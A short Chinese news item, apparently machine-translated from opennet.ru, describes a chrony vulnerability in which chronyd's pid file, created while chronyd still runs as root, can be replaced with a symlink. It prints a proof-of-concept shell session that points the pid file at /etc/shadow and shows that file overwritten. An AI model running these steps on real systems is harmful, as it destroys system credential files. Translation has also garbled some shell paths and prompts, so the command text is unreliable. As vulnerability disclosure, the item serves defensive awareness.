В
该漏洞是由于 pid 文件的不安全创建造成的,该文件是在 chrony 尚未重置权限并以 root 身份运行的阶段创建的。 在本例中,写入 pid 文件的 /run/chrony 目录是通过 systemd-tmpfiles 或在与用户和组“chrony”关联启动 chronyd 时使用权限 0750 创建的。 因此,如果您有权访问用户 chrony,则可以使用符号链接替换 pid 文件 /run/chrony/chronyd.pid。 符号链接可以指向 chronyd 启动时将被覆盖的任何系统文件。
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /运行/chrony
chrony$ ln -s /etc/shadow chronyd.pid
慢性$退出
根# /usr/sbin/chronyd -n
^C
# 将保存 chronyd 进程 ID,而不是 /etc/shadow 的内容
根#猫/etc/shadow
15287
漏洞
SUSE 和 openSUSE 问题
来源: opennet.ru